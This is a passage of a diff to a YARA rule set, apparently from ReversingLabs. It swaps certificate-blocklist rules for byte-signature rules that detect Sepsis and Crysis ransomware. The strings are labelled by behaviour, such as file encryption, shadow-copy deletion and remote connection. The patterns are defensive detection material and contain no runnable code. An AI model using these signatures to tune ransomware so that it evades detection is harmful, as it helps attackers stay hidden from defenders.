+            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ??
+            ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 0D ?? ??
+            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 8B 10 FF 12 52 50 8B 45 ?? 8B 10 FF 52 ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 50 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 8B 10 FF 52 ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 50
+            8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$delete_shadow_copies = {
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B
+            E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Datamingo Limited" and ( pe.signatures [ i ] . serial == "00:9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" or pe.signatures [ i ] . serial == "9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" ) and 1557187200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $delete_shadow_copies )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_269174F9Fe7C6Ed4E1D19B26C3F5B35F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sepsis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sepsis ransomware."
 		author = "ReversingLabs"
-		id = "fbcf1f18-f612-5516-9a67-2564de76c456"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "0c26d6e0-1d64-5f47-8e21-6710a531bc74"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3866-L3882"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sepsis.yara#L1-L126"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "95c9720d6311c2fe7026b6cac092d59967479e6c9382eac1d26f7745efa92860"
+		logic_hash = "171ad074a780b45195c6e02b111b3883c58a4028e635c4d6b8ce27c5e05e35d7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sepsis"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files_1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 84 24 ?? ?? ?? ?? 56 57 8B 3D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF D7 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+		$search_files_2 = {
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ??
+            ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ??
+            50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A
+        }
+		$search_files_3 = {
+            66 8B 0A 83 C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B
+            E5 5D C2
+        }
+		$search_files_4 = {
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ??
+            ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A ?? 66 8B 0A 83
+            C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2
+        }
+		$encrypt_files_1 = {
+            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? FF D6 0F 10 05 ?? ?? ?? ?? 8B F8 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 0F 11 07 89 3D ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 47 ?? 0F 10 05 ??
+            ?? ?? ?? 0F 11 47 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 8D
+            45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B CF 8D 51
+        }
+		$encrypt_files_2 = {
+            8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 4D ??
+            89 4D ?? FF D3 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF D6 FF 75 ?? 8B F0 6A ?? 56 E8 ??
+            ?? ?? ?? FF 75 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? FF 75 ?? 50 56 6A ?? 6A ??
+            6A ?? FF 75 ?? FF D3 8B F8 F7 DF 1B FF 23 FE 8B 35 ?? ?? ?? ?? 8B D7 8D 4A ?? 66 90
+            8A 02 42 84 C0 75 ?? 2B D1 8B CF E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84
+            C9 75 ?? 2B C2 57 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 81 3D ?? ?? ?? ?? ?? ??
+            ?? ?? 0F 82 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_3 = {
+            55 8B EC 83 EC ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B C1 68 ?? ?? ?? ?? 50
+            89 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 0B C0 5F 8B E5 5D C3 53 6A ?? 57 FF
+            15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 8B D8 56 B8 ?? ??
+            ?? ?? 6A ?? 3B D8 0F 47 D8 53 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ??
+            75 ?? 5E 5B 0B C0 5F 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B
+            35 ?? ?? ?? ?? 89 45 ?? FF D6 57 FF D6 E8 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 05
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B F8 BE ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11
+            05 ?? ?? ?? ?? 85 DB 74
+        }
+		$encrypt_files_4 = {
+            8A 0C 06 8D 40 ?? 30 48 ?? 83 EA ?? 75 ?? 8B CF E8 ?? ?? ?? ?? 8B F7 83 C7 ?? 83 EB
+            ?? 75 ?? 8B 45 ?? 0F 10 06 50 0F 11 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B F2
+        }
+		$encrypt_files_5 = {
+            66 8B 02 83 C2 ?? 66 85 C0 75 ?? BB ?? ?? ?? ?? 2B D6 8D 7B ?? 66 8B 47 ?? 83 C7 ??
+            66 85 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? 83 C3 ?? F3 A4 66 8B 43 ?? 83 C3
+            ?? 66 85 C0 75 ?? 8B FB B9 ?? ?? ?? ?? 8B 5D ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
+            53 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 35 ?? ?? ?? ?? 6A
+            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 5E 5B 33 C0 5F 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GO ONLINE d.o.o." and pe.signatures [ i ] . serial == "26:91:74:f9:fe:7c:6e:d4:e1:d1:9b:26:c3:f5:b3:5f" and 1586386919 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_523Fb4036368Dc26192D68827F2D889B : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Crysis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Crysis ransomware."
 		author = "ReversingLabs"
-		id = "bfce2ea9-cbe0-5b58-b7f8-39d2dad28db6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "bba2bbf5-ff77-5ec4-ae7f-afae1b564fb7"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3884-L3900"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Crysis.yara#L1-L108"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f1886a046305637d335c493972560de56d8186bf99183aed5e2040b2e530fc22"
+		logic_hash = "3c9250206f94ac65c1fc24e83cf8cdd76d10066086ef1f34ec14791d237c0263"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Crysis"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ??
+            6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9
+            ?? ?? ?? ?? 66 89 4D ?? 6A ?? FF 15 ?? ?? ?? ?? 66 89 45 ?? 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 83 3C 82 ??
+            74 ?? 8B 4D ?? 0F BF 51 ?? 52 8B 45 ?? 8B 48 ?? 8B 55 ?? 8B 04 91 50 8D 4D ?? 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
+            ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ??
+            6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$enumerate_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 33 DB 81 7D ?? ?? ?? ?? ?? 56 57 89 5C 24 ??
+            0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ??
+            57 8B F0 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 6A ??
+            68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 56
+            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8D 4C 24 ?? 51 68
+            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? F6 44 24
+            ?? ?? 74 ?? 66 83 7C 24 ?? ?? 74 ?? 53 8D 54 24 ?? 52 8B D6 8B CF FF 55 ?? 85 C0 7E
+            ?? 8B 45 ?? 8B 4D ?? 40 50 53 51 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 53 8D 54 24 ?? 52
+            8B D6 8B CF FF 55 ?? 85 C0 7E ?? FF 44 24 ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ??
+            ?? ?? ?? 85 C0 7F ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 56 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
+        }
+		$enumerate_resources = {
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83
+            ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B
+            45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B
+            4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
+            4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83
+            C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 83 7C
+            01 ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B
+            54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45
+            ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83
+            E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5E 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 8B D8 33 C0 56 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 8B
+            45 ?? 6A ?? 50 8D 4D ?? 51 8D 77 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
+            D3 83 E2 ?? 2B DA 83 EB ?? 83 C4 ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 50 FF D3 89 45 ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 51 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 81 C2
+            ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? A8 ?? 74 ?? 83 E0 ?? 50 8B
+            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51
+            FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 33 C0
